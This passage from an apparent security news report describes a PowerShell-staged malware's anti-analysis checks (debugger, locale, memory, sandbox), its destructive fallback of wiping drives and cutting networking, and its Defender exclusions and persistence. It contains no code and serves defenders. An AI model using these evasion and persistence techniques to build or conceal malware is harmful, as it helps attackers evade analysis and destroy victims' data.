What's notable about the modus operandi is the incorporation of obfuscated code designed to thwart analysis, in addition to scanning for the presence of debugging software and halt the execution if the system language is set to Chinese or Russian.

The malware is also designed to verify the amount of physical memory, and once again terminate itself if it's less than 4GB. Also included is a check for virtualization infrastructure to determine if the malware is being executed in an analysis environment or sandbox.

But if this test fails, rather than simply quitting the execution, the malware disables system network adapters, reconfigures Windows Firewall to block all inbound and outbound traffic, recursively deletes data in all drives, and shuts down the computer.

Should all these checks pass, the PowerShell stager proceeds to disable logging, add Windows Defender exclusions for LNK, RAR, and EXE files, and establish persistence via a scheduled task or Windows Registry modifications.

"Overall, it is clear that this attack was relatively sophisticated with the malicious threat actor paying specific attention to opsec," the researchers noted. "While this was a very targeted attack, the tactics and techniques used are well known and it is important to stay vigilant."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows